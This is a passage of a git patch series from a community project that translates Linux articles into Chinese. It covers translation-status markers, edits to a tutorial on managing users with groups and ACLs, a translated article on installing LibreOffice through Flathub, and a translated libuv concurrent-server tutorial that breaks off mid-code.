Favorite Container OS.md similarity index 100% rename from translated/tech/20171124 Photon Could Be Your New Favorite Container OS.md rename to published/20171124 Photon Could Be Your New Favorite Container OS.md From 17255c900268bf1c6bd669bbed53a5ab58b038e2 Mon Sep 17 00:00:00 2001 From: qhwdw Date: Mon, 4 Dec 2017 22:48:12 +0800 Subject: [PATCH 0252/1627] Translating by qhwdw --- ...20160922 A Linux users guide to Logical Volume Management.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/sources/tech/20160922 A Linux users guide to Logical Volume Management.md b/sources/tech/20160922 A Linux users guide to Logical Volume Management.md index ff0e390f38..baed1b3976 100644 --- a/sources/tech/20160922 A Linux users guide to Logical Volume Management.md +++ b/sources/tech/20160922 A Linux users guide to Logical Volume Management.md @@ -1,4 +1,4 @@ -A Linux user's guide to Logical Volume Management +Translating by qhwdw A Linux user's guide to Logical Volume Management ============================================================ ![Logical Volume Management (LVM)](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/rh_003499_01_other11x_cc.png?itok=I_kCDYj0 "Logical Volume Management (LVM)") From 2746612bf85dcef35f6133b35b47f226dee9f147 Mon Sep 17 00:00:00 2001 From: qhwdw <33189910+qhwdw@users.noreply.github.com> Date: Mon, 4 Dec 2017 23:14:31 +0800 Subject: [PATCH 0253/1627] Revert "Translating by qhwdw" --- core.md | 2 +- ...20160922 A Linux users guide to Logical Volume Management.md | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/core.md b/core.md index 2ec8aa89cf..da45c009fc 100644 --- a/core.md +++ b/core.md @@ -36,4 +36,4 @@ - 除非必要,合并 PR 时不要 squash-merge wxy@LCTT -2016/12/24 +2016/12/24 \ No newline at end of file diff --git a/sources/tech/20160922 A Linux users guide to Logical Volume Management.md b/sources/tech/20160922 A Linux users guide to Logical Volume Management.md index baed1b3976..ff0e390f38 100644 --- a/sources/tech/20160922 A Linux users guide to Logical Volume Management.md +++ b/sources/tech/20160922 A Linux users guide to Logical Volume Management.md @@ -1,4 +1,4 @@ -Translating by qhwdw A Linux user's guide to Logical Volume Management +A Linux user's guide to Logical Volume Management ============================================================ ![Logical Volume Management (LVM)](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/rh_003499_01_other11x_cc.png?itok=I_kCDYj0 "Logical Volume Management (LVM)") From 0d97d9c993bf939edfa0d62f07c7d39ec919a0f7 Mon Sep 17 00:00:00 2001 From: imquanquan Date: Mon, 4 Dec 2017 23:15:21 +0800 Subject: [PATCH 0254/1627] fix errors based on the previous translations --- ...ow to Manage Users with Groups in Linux.md | 22 +++++++++---------- 1 file changed, 11 insertions(+), 11 deletions(-) diff --git a/translated/tech/20171201 How to Manage Users with Groups in Linux.md b/translated/tech/20171201 How to Manage Users with Groups in Linux.md index 8baac8707b..1927de6817 100644 --- a/translated/tech/20171201 How to Manage Users with Groups in Linux.md +++ b/translated/tech/20171201 How to Manage Users with Groups in Linux.md @@ -5,13 +5,13 @@ ![groups](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/group-of-people-1645356_1920.jpg?itok=rJlAxBSV) -在本教程中了解如何通过用户组和访问控制表(ACL)来管理用户。 +本教程可以了解如何通过用户组和访问控制表(ACL)来管理用户。 [创意共享协议][4] -当你需要管理一台容纳多个用户的 Linux 机器时,比起一些基本的用户管理工具所提供的方法,有时候你需要对这些用户采取更多的用户权限管理方式。特别是当你要管理某些用户的权限时,这个想法尤为重要。比如说,你有一个目录,一个用户组中的用户可以通过读和写的权限访问这个目录,而其他用户组中的用户对这个目录只有读的权限。通过 Linux 这是完全可以实现的。但是你首先必须了解如何通过用户组和访问控制表(ACL)来管理用户。 +当你需要管理一台容纳多个用户的 Linux 机器时,比起一些基本的用户管理工具所提供的方法,有时候你需要对这些用户采取更多的用户权限管理方式。特别是当你要管理某些用户的权限时,这个想法尤为重要。比如说,你有一个目录,某个用户组中的用户可以通过读和写的权限访问这个目录,而其他用户组中的用户对这个目录只有读的权限。在 Linux 中,这是完全可以实现的。但前提是你必须先了解如何通过用户组和访问控制表(ACL)来管理用户。 -我们将从简单的用户开始,逐渐深入到复杂的访问控制表(ACL)。你所需要做的一切都将在你选择的 Linux 发行版中完成。本文的重点是用户组,所以不会涉及到关于用户的基础知识。 +我们将从简单的用户开始,逐渐深入到复杂的访问控制表(ACL)。你可以在你所选择的 Linux 发行版完成你所需要做的一切。本文的重点是用户组,所以不会涉及到关于用户的基础知识。 为了达到演示的目的,我将假设: @@ -27,7 +27,7 @@ * editors -olivia 属于 editors 用户组,而 nathan 属于 readers 用户组。reader 用户组对 ``/DATA`` 目录只有读的权限,而 editors 用户组则对 ``/DATA`` 目录同时有读和写的权限。当然,这是个非常小的任务,但它会给你基本的用法。你可以扩展这个任务以适应你其他更大的需求。 +olivia 属于 editors 用户组,而 nathan 属于 readers 用户组。reader 用户组对 ``/DATA`` 目录只有读的权限,而 editors 用户组则对 ``/DATA`` 目录同时有读和写的权限。当然,这是个非常小的任务,但它会给你基本的信息·。你可以扩展这个任务以适应你其他更大的需求。 我将在 Ubuntu 16.04 Server 平台上进行演示。这些命令都是通用的,唯一不同的是,要是在你的发行版中不使用 sudo 命令,你必须切换到 root 用户来执行这些命令。 @@ -74,7 +74,7 @@ addgroup editors [Used with permission][5] -创建用户组后,我们需要给他们添加用户。我们用以下命令来将 nathan 添加到 readers 用户组: +创建用户组后,我们需要添加我们的用户到这两个用户组。我们用以下命令来将 nathan 用户添加到 readers 用户组: ``` sudo usermod -a -G readers nathan @@ -85,11 +85,11 @@ sudo usermod -a -G readers nathan sudo usermod -a -G editors olivia ``` -现在我们已经准备好用用户组来管理用户了。 +现在我们可以通过用户组来管理用户了。 ### 给用户组授予目录的权限 -假设你有个目录 ``/READERS``,允许 readers 用户组的所有成员访问这个目录。首先,我们执行以下命令来更改目录所属用户组: +假设你有个目录 ``/READERS`` 且允许 readers 用户组的所有成员访问这个目录。首先,我们执行以下命令来更改目录所属用户组: ``` sudo chown -R :readers /READERS @@ -101,7 +101,7 @@ sudo chown -R :readers /READERS sudo chmod -R g-w /READERS ``` -然后我们执行下面的命令来收回其他用户对这个目录的访问权限(以防止任何不在读者组中的用户访问这个目录里的文件): +然后我们执行下面的命令来收回其他用户对这个目录的访问权限(以防止任何不在 readers 组中的用户访问这个目录里的文件): ``` sudo chmod -R o-x /READERS @@ -126,7 +126,7 @@ sudo chmod -R o-x /EDITORS ### 使用访问控制表(ACL) -现在,让我们把这个问题变得棘手一点。假设你有一个目录 ``/DATA`` 并且你想给 readers 用户组的成员读取权限同时给 editors 用户组的成员读和写的权限。为此,你必须要用到 setfacl 命令。setfacl 命令可以为文件或文件夹设置一个访问控制表(ACL)。 +现在,让我们把这个问题变得棘手一点。假设你有一个目录 ``/DATA`` 并且你想给 readers 用户组的成员读取权限并同时给 editors 用户组的成员读和写的权限。为此,你必须要用到 setfacl 命令。setfacl 命令可以为文件或文件夹设置一个访问控制表(ACL)。 这个命令的结构如下: @@ -142,7 +142,7 @@ sudo setfacl -m g:readers:rx -R /DATA 现在 readers 用户组里面的每一个用户都可以读取 /DATA 目录里的文件了,但是他们不能修改里面的内容。 -为了给 editors 用户组里面的用户读写权限,我们执行了以下的命令: +为了给 editors 用户组里面的用户读写权限,我们执行了以下命令: ``` sudo setfacl -m g:editors:rwx -R /DATA @@ -151,7 +151,7 @@ sudo setfacl -m g:editors:rwx -R /DATA ### 更多的权限控制 -使用访问控制表(ACL),你可以实现你所需的权限控制。你可以实现将用户添加到用户组,并且可靠灵活地控制这些用户组对每个目录的权限以达到你的需求。想要了解上述工具的更多信息,可以执行下列的命令: +使用访问控制表(ACL),你可以实现你所需的权限控制。你可以添加用户到用户组,并且灵活地控制这些用户组对每个目录的权限以达到你的需求。如果想了解上述工具的更多信息,可以执行下列的命令: * man usradd From 832f9e7fe8a42e4bd8b588f52a434f33a673542d Mon Sep 17 00:00:00 2001 From: Unknown Date: Tue, 5 Dec 2017 07:22:51 +0800 Subject: [PATCH 0255/1627] translating by aiwhj translating by aiwhj --- .../20171129 5 best practices for getting started with DevOps.md | 1 + 1 file changed, 1 insertion(+) diff --git a/sources/tech/20171129 5 best practices for getting started with DevOps.md b/sources/tech/20171129 5 best practices for getting started with DevOps.md index 962f37aaf4..7694180c14 100644 --- a/sources/tech/20171129 5 best practices for getting started with DevOps.md +++ b/sources/tech/20171129 5 best practices for getting started with DevOps.md @@ -1,3 +1,4 @@ +translating---aiwhj 5 best practices for getting started with DevOps ============================================================ From a94f1fca1bfa0c9150da7656dce9685b31bec345 Mon Sep 17 00:00:00 2001 From: Sihua Zheng Date: Tue, 5 Dec 2017 09:12:33 +0800 Subject: [PATCH 0256/1627] translated --- ...ilable on Flathub the Flatpak App Store.md | 73 ------------------- ...ilable on Flathub the Flatpak App Store.md | 70 ++++++++++++++++++ 2 files changed, 70 insertions(+), 73 deletions(-) delete mode 100644 sources/tech/20171121 LibreOffice Is Now Available on Flathub the Flatpak App Store.md create mode 100644 translated/tech/20171121 LibreOffice Is Now Available on Flathub the Flatpak App Store.md diff --git a/sources/tech/20171121 LibreOffice Is Now Available on Flathub the Flatpak App Store.md b/sources/tech/20171121 LibreOffice Is Now Available on Flathub the Flatpak App Store.md deleted file mode 100644 index fe72e37128..0000000000 --- a/sources/tech/20171121 LibreOffice Is Now Available on Flathub the Flatpak App Store.md +++ /dev/null @@ -1,73 +0,0 @@ -translating---geekpi - - -# LibreOffice Is Now Available on Flathub, the Flatpak App Store - -![LibreOffice on Flathub](http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/libroffice-on-flathub-750x250.jpeg) - -LibreOffice is now available to install from [Flathub][3], the centralised Flatpak app store. - -Its arrival allows anyone running a modern Linux distribution to install the latest stable release of LibreOffice in a click or two, without having to hunt down a PPA, tussle with tarballs or wait for a distro provider to package it up. - -A [LibreOffice Flatpak][5] has been available for users to download and install since August of last year and the [LibreOffice 5.2][6] release. - -What’s “new” here is the distribution method. Rather than release updates through their own dedicated server The Document Foundation has opted to use Flathub. - -This is  _great_  news for end users as it means there’s one less repo to worry about adding on a fresh install, but it’s also good news for Flatpak advocates too: LibreOffice is open-source software’s most popular productivity suite. Its support for both format and app store is sure to be warmly welcomed. - -At the time of writing you can install LibreOffice 5.4.2 from Flathub. New stable releases will be added as and when they’re released. - -### Enable Flathub on Ubuntu - -![](http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/flathub-750x495.png) - -Fedora, Arch, and Linux Mint 18.3 users have Flatpak installed, ready to go, out of the box. Mint even comes with the Flathub remote pre-enabled. - -[Install LibreOffice from Flathub][7] - -To get Flatpak up and running on Ubuntu you first have to install it: - -``` -sudo apt install flatpak gnome-software-plugin-flatpak -``` - -To be able to install apps from Flathub you need to add the Flathub remote server: - -``` -flatpak remote-add --if-not-exists flathub https://flathub.org/repo/flathub.flatpakrepo -``` - -That’s pretty much it. Just log out and back in (so that Ubuntu Software refreshes its cache) and you  _should_  be able to find any Flatpak apps available on Flathub through the Ubuntu Software app. - -In this instance, search for “LibreOffice” and locate the result that has a line of text underneath mentioning Flathub. (Do bear in mind that Ubuntu has tweaked the Software client to shows Snap app results above everything else, so you may need scroll down the list of results to see it). - -There is a [bug with installing Flatpak apps][8] from a flatpakref file, so if the above method doesn’t work you can also install Flatpak apps form Flathub using the command line. - -The Flathub website lists the command needed to install each app. Switch to the “Command Line” tab to see them. - -#### More apps on Flathub - -If you read this site regularly enough you’ll know that I  _love_  Flathub. It’s home to some of my favourite apps (Corebird, Parlatype, GNOME MPV, Peek, Audacity, GIMP… etc). I get the latest, stable versions of these apps (plus any dependencies they need) without compromise. - -And, as I tweeted a week or so back, most Flatpak apps now look great with GTK themes — no more [workarounds][9]required! - --------------------------------------------------------------------------------- - -via: http://www.omgubuntu.co.uk/2017/11/libreoffice-now-available-flathub-flatpak-app-store - -作者:[ JOEY SNEDDON ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://plus.google.com/117485690627814051450/?rel=author -[1]:https://plus.google.com/117485690627814051450/?rel=author -[2]:http://www.omgubuntu.co.uk/category/news -[3]:http://www.flathub.org/ -[4]:http://www.omgubuntu.co.uk/2017/11/libreoffice-now-available-flathub-flatpak-app-store -[5]:http://www.omgubuntu.co.uk/2016/08/libreoffice-5-2-released-whats-new -[6]:http://www.omgubuntu.co.uk/2016/08/libreoffice-5-2-released-whats-new -[7]:https://flathub.org/repo/appstream/org.libreoffice.LibreOffice.flatpakref -[8]:https://bugs.launchpad.net/ubuntu/+source/gnome-software/+bug/1716409 -[9]:http://www.omgubuntu.co.uk/2017/05/flatpak-theme-issue-fix diff --git a/translated/tech/20171121 LibreOffice Is Now Available on Flathub the Flatpak App Store.md b/translated/tech/20171121 LibreOffice Is Now Available on Flathub the Flatpak App Store.md new file mode 100644 index 0000000000..4edb744098 --- /dev/null +++ b/translated/tech/20171121 LibreOffice Is Now Available on Flathub the Flatpak App Store.md @@ -0,0 +1,70 @@ +# LibreOffice 现在在 Flatpak 的 Flathub 应用商店提供 + +![LibreOffice on Flathub](http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/libroffice-on-flathub-750x250.jpeg) + +LibreOffice 现在可以从集中化的 Flatpak 应用商店 [Flathub][3] 进行安装。 + +它的到来使任何运行现代 Linux 发行版的人都能只点击一两次安装 LibreOffice 的最新稳定版本,而无需搜索 PPA,纠缠 tar 包或等待发行商将其打包。 + +自去年 8 月份以来,[LibreOffice Flatpak][5] 已经可供用户下载和安装 [LibreOffice 5.2][6]。 + +这里“新”的是发行方法。文档基金会选择使用 Flathub 而不是专门的服务器来发布更新。 + +这对于终端用户来说是一个_很好_的消息,因为这意味着不需要在新安装时担心仓库,但对于 Flatpak 的倡议者来说也是一个好消息:LibreOffice 是开源软件最流行的生产力套件。它对格式和应用商店的支持肯定会受到热烈的欢迎。 + +在撰写本文时,你可以从 Flathub 安装 LibreOffice 5.4.2。新的稳定版本将在发布时添加。 + +### 在 Ubuntu 上启用 Flathub + +![](http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/flathub-750x495.png) + +Fedora、Arch 和 Linux Mint 18.3 用户已经安装了 Flatpak,随时可以开箱即用。Mint 甚至预启用了 Flathub remote。 + +[从 Flathub 安装 LibreOffice][7] + +要在 Ubuntu 上启动并运行 Flatpak,首先必须安装它: + +``` +sudo apt install flatpak gnome-software-plugin-flatpak +``` + +为了能够从 Flathub 安装应用程序,你需要添加 Flathub 远程服务器: + +``` +flatpak remote-add --if-not-exists flathub https://flathub.org/repo/flathub.flatpakrepo +``` + +这就行了。只需注销并返回(以便 Ubuntu Software 刷新其缓存),之后你应该能够通过 Ubuntu Software 看到 Flathub 上的任何 Flatpak 程序了。 + +在本例中,搜索 “LibreOffice” 并在结果中找到下面有 Flathub 提示的结果。(请记住,Ubuntu 已经调整了客户端,来将 Snap 程序显示在最上面,所以你可能需要向下滚动列表来查看它)。 + +从 flatpakref 中[安装 Flatpak 程序有一个 bug][8],所以如果上面的方法不起作用,你也可以使用命令行从 Flathub 中安装 Flathub 程序。 + +Flathub 网站列出了安装每个程序所需的命令。切换到“命令行”选项卡来查看它们。 + +#### Flathub 上更多的应用 + +如果你经常看这个网站,你就会知道我喜欢 Flathub。这是我最喜欢的一些应用(Corebird、Parlatype、GNOME MPV、Peek、Audacity、GIMP 等)的家园。我无需折衷就能获得这些应用程序的最新,稳定版本(加上它们需要的所有依赖)。 + +而且,在我 twiiter 上发布一周左右后,大多数 Flatpak 应用现在看起来有很棒 GTK 主题 - 不再需要[临时方案][9]了! + +-------------------------------------------------------------------------------- + +via: http://www.omgubuntu.co.uk/2017/11/libreoffice-now-available-flathub-flatpak-app-store + +作者:[ JOEY SNEDDON ][a] +译者:[geekpi](https://github.com/geekpi) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://plus.google.com/117485690627814051450/?rel=author +[1]:https://plus.google.com/117485690627814051450/?rel=author +[2]:http://www.omgubuntu.co.uk/category/news +[3]:http://www.flathub.org/ +[4]:http://www.omgubuntu.co.uk/2017/11/libreoffice-now-available-flathub-flatpak-app-store +[5]:http://www.omgubuntu.co.uk/2016/08/libreoffice-5-2-released-whats-new +[6]:http://www.omgubuntu.co.uk/2016/08/libreoffice-5-2-released-whats-new +[7]:https://flathub.org/repo/appstream/org.libreoffice.LibreOffice.flatpakref +[8]:https://bugs.launchpad.net/ubuntu/+source/gnome-software/+bug/1716409 +[9]:http://www.omgubuntu.co.uk/2017/05/flatpak-theme-issue-fix From 7af7dee62e699dcbcc64adf28af774f350f9d67e Mon Sep 17 00:00:00 2001 From: geekpi Date: Tue, 5 Dec 2017 09:16:46 +0800 Subject: [PATCH 0257/1627] translating --- .../20171125 AWS to Help Build ONNX Open Source AI Platform.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sources/tech/20171125 AWS to Help Build ONNX Open Source AI Platform.md b/sources/tech/20171125 AWS to Help Build ONNX Open Source AI Platform.md index c09d66bc57..1e9424178e 100644 --- a/sources/tech/20171125 AWS to Help Build ONNX Open Source AI Platform.md +++ b/sources/tech/20171125 AWS to Help Build ONNX Open Source AI Platform.md @@ -1,3 +1,5 @@ +translating---geekpi + AWS to Help Build ONNX Open Source AI Platform ============================================================ ![onnx-open-source-ai-platform](https://www.linuxinsider.com/article_images/story_graphics_xlarge/xl-2017-onnx-1.jpg) From 4b1f36663bbdfa11a6d0709938f8e378de19315b Mon Sep 17 00:00:00 2001 From: runningwater Date: Tue, 5 Dec 2017 09:32:57 +0800 Subject: [PATCH 0258/1627] Update 20171128 Why Python and Pygame are a great pair for beginning programmers.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 翻译中 --- ...on and Pygame are a great pair for beginning programmers.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/sources/tech/20171128 Why Python and Pygame are a great pair for beginning programmers.md b/sources/tech/20171128 Why Python and Pygame are a great pair for beginning programmers.md index 479bfb1232..9afdfbb2b1 100644 --- a/sources/tech/20171128 Why Python and Pygame are a great pair for beginning programmers.md +++ b/sources/tech/20171128 Why Python and Pygame are a great pair for beginning programmers.md @@ -1,3 +1,4 @@ +(translating by runningwater) Why Python and Pygame are a great pair for beginning programmers ============================================================ @@ -101,7 +102,7 @@ Despite my recommendation, I always suspect that kids soon move to JavaScript. A via: https://opensource.com/article/17/11/pygame 作者:[Craig Oda ][a] -译者:[译者ID](https://github.com/译者ID) +译者:[runningwater](https://github.com/runningwater) 校对:[校对者ID](https://github.com/校对者ID) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From 5f2c9586bd9a97ca81f749f1ede5e543e507e26a Mon Sep 17 00:00:00 2001 From: qhwdw Date: Mon, 4 Dec 2017 15:30:49 +0800 Subject: [PATCH 0259/1627] Translated by qhwdw --- ...1109 Concurrent Servers- Part 4 - libuv.md | 492 ++++++++++++++++++ 1 file changed, 492 insertions(+) create mode 100644 translated/tech/20171109 Concurrent Servers- Part 4 - libuv.md diff --git a/translated/tech/20171109 Concurrent Servers- Part 4 - libuv.md b/translated/tech/20171109 Concurrent Servers- Part 4 - libuv.md new file mode 100644 index 0000000000..b4db491e4e --- /dev/null +++ b/translated/tech/20171109 Concurrent Servers- Part 4 - libuv.md @@ -0,0 +1,492 @@ +[并发服务器:第四部分 - libuv][17] +============================================================ + +这是写并发网络服务器系列文章的第四部分。在这一部分中,我们将使用 libuv 去再次重写我们的服务器,并且也讨论关于使用一个线程池在回调中去处理耗时任务。最终,我们去看一下底层的 libuv,花一点时间去学习如何用异步 API 对文件系统阻塞操作进行封装。 + +这一系列的所有文章包括: + +* [第一部分 - 简介][7] + +* [第二部分 - 线程][8] + +* [第三部分 - 事件驱动][9] + +* [第四部分 - libuv][10] + +### 使用 Linux 抽象出事件驱动循环 + +在 [第三部分][11] 中,我们看到了基于 `select` 和 `epoll` 的相似之处,并且,我说过,在它们之间抽象出细微的差别是件很有魅力的事。Numerous 库已经做到了这些,但是,因为在这一部分中,我将去选一个并使用它。我选的这个库是 [libuv][12],它最初设计用于 Node.js 底层的轻便的平台层,并且,后来发现在其它的项目中已有使用。libuv 是用 C 写的,因此,它具有很高的可移植性,非常适用嵌入到像 JavaScript 和 Python 这样的高级语言中。 + +虽然 libuv 为抽象出底层平台细节已经有了一个非常大的框架,但它仍然是一个以 _事件循环_ 思想为中心的。在我们第三部分的事件驱动服务器中,事件循环在 main 函数中是很明确的;当使用 libuv 时,循环通常隐藏在库自身中,而用户代码仅需要注册事件句柄(作为一个回调函数)和运行这个循环。此外,libuv 将为给定的平台实现更快的事件循环实现。对于 Linux 它是 epoll,等等。 + +![libuv loop](https://eli.thegreenplace.net/images/2017/libuvloop.png) + +libuv 支持多路事件循环,并且,因此一个事件循环在库中是非常重要的;它有一个句柄 - `uv_loop_t`,和创建/杀死/启动/停止循环的函数。也就是说,在这篇文章中,我将仅需要使用 “默认的” 循环,libuv 可通过 `uv_default_loop()` 提供它;多路循环大多用于多线程事件驱动的服务器,这是一个更高级别的话题,我将留在这一系列文章的以后部分。 + +### 使用 libuv 的并发服务器 + +为了对 libuv 有一个更深的印象,让我们跳转到我们的可靠的协议服务器,它通过我们的这个系列已经有了一个强大的重新实现。这个服务器的结构与第三部分中的基于 select 和 epoll 的服务器有一些相似之处。因为,它也依赖回调。完整的 [示例代码在这里][13];我们开始设置这个服务器的套接字绑定到一个本地端口: + +``` +int portnum = 9090; +if (argc >= 2) { + portnum = atoi(argv[1]); +} +printf("Serving on port %d\n", portnum); + +int rc; +uv_tcp_t server_stream; +if ((rc = uv_tcp_init(uv_default_loop(), &server_stream)) < 0) { + die("uv_tcp_init failed: %s", uv_strerror(rc)); +} + +struct sockaddr_in server_address; +if ((rc = uv_ip4_addr("0.0.0.0", portnum, &server_address)) < 0) { + die("uv_ip4_addr failed: %s", uv_strerror(rc)); +} + +if ((rc = uv_tcp_bind(&server_stream, (const struct sockaddr*)&server_address, 0)) < 0) { + die("uv_tcp_bind failed: %s", uv_strerror(rc)); +} +``` + +除了它被封装进 libuv APIs 中之外,你看到的是一个相当标准的套接字。在它的返回中,我们取得一个可工作于任何 libuv 支持的平台上的轻便的接口。 + +这些代码也很认真负责地演示了错误处理;多数的 libuv 函数返回一个整数状态,返回一个负数意味着出现了一个错误。在我们的服务器中,我们把这些错误按致命的问题处理,但也可以设想为一个更优雅的恢复。 + +现在,那个套接字已经绑定,是时候去监听它了。这里我们运行一个回调注册: + +``` +// Listen on the socket for new peers to connect. When a new peer connects, +// the on_peer_connected callback will be invoked. +if ((rc = uv_listen((uv_stream_t*)&server_stream, N_BACKLOG, on_peer_connected)) < 0) { + die("uv_listen failed: %s", uv_strerror(rc)); +} +``` + +当新的对端连接到这个套接字,`uv_listen` 将被调用去注册一个事件循环回调。我们的回调在这里被称为 `on_peer_connected`,并且我们一会儿将去检测它。 + +最终,main 运行这个 libuv 循环,直到它被停止(`uv_run` 仅在循环被停止或者发生错误时返回) + +``` +// Run the libuv event loop. +uv_run(uv_default_loop(), UV_RUN_DEFAULT); + +// If uv_run returned, close the default loop before exiting. +return uv_loop_close(uv_default_loop()); +``` + +注意,那个仅是一个单一的通过 main 优先去运行的事件循环回调;我们不久将看到怎么去添加更多的另外的回调。在事件循环的整个运行时中,添加和删除回调并不是一个问题 - 事实上,大多数服务器就是这么写的。 + +这是一个 `on_peer_connected`,它处理到服务器的新的客户端连接: + +``` +void on_peer_connected(uv_stream_t* server_stream, int status) { + if (status < 0) { + fprintf(stderr, "Peer connection error: %s\n", uv_strerror(status)); + return; + } + + // client will represent this peer; it's allocated on the heap and only + // released when the client disconnects. The client holds a pointer to + // peer_state_t in its data field; this peer state tracks the protocol state + // with this client throughout interaction. + uv_tcp_t* client = (uv_tcp_t*)xmalloc(sizeof(*client)); + int rc; + if ((rc = uv_tcp_init(uv_default_loop(), client)) < 0) { + die("uv_tcp_init failed: %s", uv_strerror(rc)); + } + client->data = NULL; + + if (uv_accept(server_stream, (uv_stream_t*)client) == 0) { + struct sockaddr_storage peername; + int namelen = sizeof(peername); + if ((rc = uv_tcp_getpeername(client, (struct sockaddr*)&peername, + &namelen)) < 0) { + die("uv_tcp_getpeername failed: %s", uv_strerror(rc)); + } + report_peer_connected((const struct sockaddr_in*)&peername, namelen); + + // Initialize the peer state for a new client: we start by sending the peer + // the initial '*' ack. + peer_state_t* peerstate = (peer_state_t*)xmalloc(sizeof(*peerstate)); + peerstate->state = INITIAL_ACK; + peerstate->sendbuf[0] = '*'; + peerstate->sendbuf_end = 1; + peerstate->client = client; + client->data = peerstate; + + // Enqueue the write request to send the ack; when it's done, + // on_wrote_init_ack will be called. The peer state is passed to the write + // request via the data pointer; the write request does not own this peer + // state - it's owned by the client handle. + uv_buf_t writebuf = uv_buf_init(peerstate->sendbuf, peerstate->sendbuf_end); + uv_write_t* req = (uv_write_t*)xmalloc(sizeof(*req)); + req->data = peerstate; + if ((rc = uv_write(req, (uv_stream_t*)client, &writebuf, 1, + on_wrote_init_ack)) < 0) { + die("uv_write failed: %s", uv_strerror(rc)); + } + } else { + uv_close((uv_handle_t*)client, on_client_closed); + } +} +``` + +这些代码都有很好的注释,但是,这里有一些重要的 libuv 语法我想去强调一下: + +* 进入回调中的自定义数据:因为 C 还没有停用,这可能是个挑战,libuv 在它的处理类型中有一个 `void*` 数据域;这些域可以被用于进入到用户数据。例如,注意 `client->data` 是如何指向到一个 `peer_state_t` 结构上,以便于通过 `uv_write` 和 `uv_read_start` 注册的回调可以知道它们正在处理的是哪个客户端的数据。 + +* 内存管理:事件驱动编程在语言中使用垃圾回收是非常容易的,因为,回调通常运行在一个它们注册的完全不同的栈框架中,使得基于栈的内存管理很困难。它总是需要传递堆分配的数据到 libuv 回调中(当所有回调运行时,除了 main,其它的都运行在栈上),并且,为了避免泄漏,许多情况下都要求这些数据去安全释放。这些都是些需要实践的内容 [[1]][6]。 + +这个服务器上对端的状态如下: + +``` +typedef struct { + ProcessingState state; + char sendbuf[SENDBUF_SIZE]; + int sendbuf_end; + uv_tcp_t* client; +} peer_state_t; +``` + +它与第三部分中的状态非常类似;我们不再需要 sendptr,因为,在调用 "done writing" 回调之前,`uv_write` 将确保去发送它提供的整个缓冲。我们也为其它的回调使用保持了一个到客户端的指针。这里是 `on_wrote_init_ack`: + +``` +void on_wrote_init_ack(uv_write_t* req, int status) { + if (status) { + die("Write error: %s\n", uv_strerror(status)); + } + peer_state_t* peerstate = (peer_state_t*)req->data; + // Flip the peer state to WAIT_FOR_MSG, and start listening for incoming data + // from this peer. + peerstate->state = WAIT_FOR_MSG; + peerstate->sendbuf_end = 0; + + int rc; + if ((rc = uv_read_start((uv_stream_t*)peerstate->client, on_alloc_buffer, + on_peer_read)) < 0) { + die("uv_read_start failed: %s", uv_strerror(rc)); + } + + // Note: the write request doesn't own the peer state, hence we only free the + // request itself, not the state. + free(req); +} +``` + +然后,我们确信知道了这个初始的 '*' 已经被发送到对端,我们通过调用 `uv_read_start` 去监听从这个对端来的入站数据,它注册一个回调(`on_peer_read`)去被调用,不论什么时候,事件循环都在套接字上接收来自客户端的调用: + +``` +void on_peer_read(uv_stream_t* client, ssize_t nread, const uv_buf_t* buf) { + if (nread < 0) { + if (nread != uv_eof) { + fprintf(stderr, "read error: %s\n", uv_strerror(nread)); + } + uv_close((uv_handle_t*)client, on_client_closed); + } else if (nread == 0) { + // from the documentation of uv_read_cb: nread might be 0, which does not + // indicate an error or eof. this is equivalent to eagain or ewouldblock + // under read(2). + } else { + // nread > 0 + assert(buf->len >= nread); + + peer_state_t* peerstate = (peer_state_t*)client->data; + if (peerstate->state == initial_ack) { + // if the initial ack hasn't been sent for some reason, ignore whatever + // the client sends in. + free(buf->base); + return; + } + + // run the protocol state machine. + for (int i = 0; i < nread; ++i) { + switch (peerstate->state) { + case initial_ack: + assert(0 && "can't reach here"); + break; + case wait_for_msg: + if (buf->base[i] == '^') { + peerstate->state = in_msg; + } + break; + case in_msg: + if (buf->base[i] == '$') { + peerstate->state = wait_for_msg; + } else { + assert(peerstate->sendbuf_end < sendbuf_size); + peerstate->sendbuf[peerstate->sendbuf_end++] = buf->base[i] + 1; + } + break; + } + } + + if (peerstate->sendbuf_end > 0) { + // we have data to send. the write buffer will point to the buffer stored + // in the peer state for this client. + uv_buf_t writebuf = + uv_buf_init(peerstate->sendbuf, peerstate->sendbuf_end); + uv_write_t* writereq = (uv_write_t*)xmalloc(sizeof(*writereq)); + writereq->data = peerstate; + int rc; + if ((rc = uv_write(writereq, (uv_stream_t*)client, &writebuf, 1, + on_wrote_buf)) < 0) { + die("uv_write failed: %s", uv_strerror(rc)); + } + } + } + free(buf->base); +} +``` + +这个服务器的运行时行为非常类似于第三部分的事件驱动服务器:所有的客户端都在一个单个的线程中并发处理。并且一些行为被维护在服务器代码中:服务器的逻辑实现为一个集成的回调,并且长周期运行是禁止的,因为它会阻塞事件循环。这一点也很类似。让我们进一步探索这个问题。 + +### 在事件驱动循环中的长周期运行的操作 + +单线程的事件驱动代码使它先天地对一些常见问题非常敏感:整个循环中的长周期运行的代码块。参见如下的程序: + +``` +void on_timer(uv_timer_t* timer) { + uint64_t timestamp = uv_hrtime(); + printf("on_timer [%" PRIu64 " ms]\n", (timestamp / 1000000) % 100000); + + // "Work" + if (random() % 5 == 0) { + printf("Sleeping...\n"); + sleep(3); + } +} + +int main(int argc, const char** argv) { + uv_timer_t 